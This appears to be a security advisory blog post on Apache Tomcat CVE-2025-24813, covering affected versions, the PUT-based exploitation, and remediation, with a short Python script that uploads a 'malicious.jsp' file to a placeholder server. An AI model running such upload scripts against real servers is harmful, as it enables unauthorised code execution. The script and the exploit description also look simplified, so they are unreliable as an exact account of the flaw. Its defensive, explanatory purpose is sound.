Apache Tomcat, a widely used open-source Java servlet container, has recently addressed a critical vulnerability that could allow attackers to execute arbitrary code remotely. The vulnerability, tracked as CVE-2025-24813, affects multiple versions of Apache Tomcat, including versions 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0.M1 to 9.0.98. This flaw, which involves improper handling of HTTP PUT requests, has been actively exploited in the wild, underscoring the urgency for affected organizations to apply the necessary patches12.
Key Takeaways
- Vulnerability: CVE-2025-24813 allows remote code execution (RCE) via malicious HTTP PUT requests.
- Affected Versions: Apache Tomcat 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0.M1 to 9.0.98.
- Impact: Attackers can upload arbitrary files and gain full control over the server.
- Status: Actively exploited in the wild.
- Remediation: Apply the latest updates from Apache.
Technical Details of the Vulnerability
The vulnerability lies in how Apache Tomcat processes HTTP PUT requests. By sending a specially crafted PUT request, an attacker can upload arbitrary files to the server. This can lead to remote code execution (RCE), effectively granting the attacker full control over the affected system3.
Exploitation Mechanism
- Malicious PUT Request: An attacker sends a crafted HTTP PUT request to the server.
- File Upload: The server processes the request and uploads the malicious file to a specified location.
- Code Execution: The attacker executes the uploaded file, leading to RCE.
This vulnerability is particularly dangerous because it does not require authentication, making it accessible to any attacker with network access to the server4.
Affected Platforms and Products
The vulnerability impacts a wide range of platforms and products, including:
| Platforms | Products |
|---|---|
| Apache Software Foundation | Apache Tomcat, Debian tomcat10, Debian tomcat9, Red Hat Enterprise Linux 8 |
| Red Hat | pki-servlet-engine, tomcat, tomcat6 |
| SUSE | SUSE openSUSE |
Relevance to Security Professionals
For Red Teamers
Red Teamers can leverage this vulnerability to demonstrate the risks associated with unpatched systems. Crafting a proof-of-concept (PoC) exploit for this vulnerability can be a valuable exercise in understanding how attackers might exploit such flaws.
For Blue Teamers and SOC Analysts
Blue Teamers and SOC Analysts should prioritize identifying and patching affected systems. Monitoring for unusual HTTP PUT requests can help detect potential exploitation attempts.
For System Administrators
System Administrators must ensure that all affected versions of Apache Tomcat are updated to the latest patched versions. Regular vulnerability scans and patch management processes should be implemented to mitigate such risks in the future.
Proof of Concept (PoC) Script
Below is a Python script that demonstrates how an attacker might exploit this vulnerability. Note: This script is for educational purposes only and should not be used maliciously.
import requests
target_url = "http://example.com/path/to/tomcat"
malicious_file = "malicious.jsp"
# Craft the malicious PUT request
headers = {
"Content-Type": "text/plain"
}
with open(malicious_file, "rb") as file:
response = requests.put(f"{target_url}/{malicious_file}", data=file, headers=headers)
if response.status_code == 201:
print(f"[+] File uploaded successfully: {target_url}/{malicious_file}")
else:
print(f"[-] Failed to upload file. Status code: {response.status_code}")Remediation Steps
- Update Apache Tomcat: Apply the latest updates from Apache to patch the vulnerability.
- Monitor Logs: Regularly review server logs for unusual HTTP PUT requests.
- Restrict Access: Limit access to the server to trusted IP addresses only.
- Implement WAF: Use a Web Application Firewall (WAF) to filter out malicious requests.
Conclusion
The discovery and patching of CVE-2025-24813 highlight the importance of maintaining up-to-date software and implementing robust security measures. Organizations using Apache Tomcat should act swiftly to apply the necessary updates and mitigate the risk of exploitation. This incident serves as a reminder of the constant vigilance required to protect systems from emerging threats.
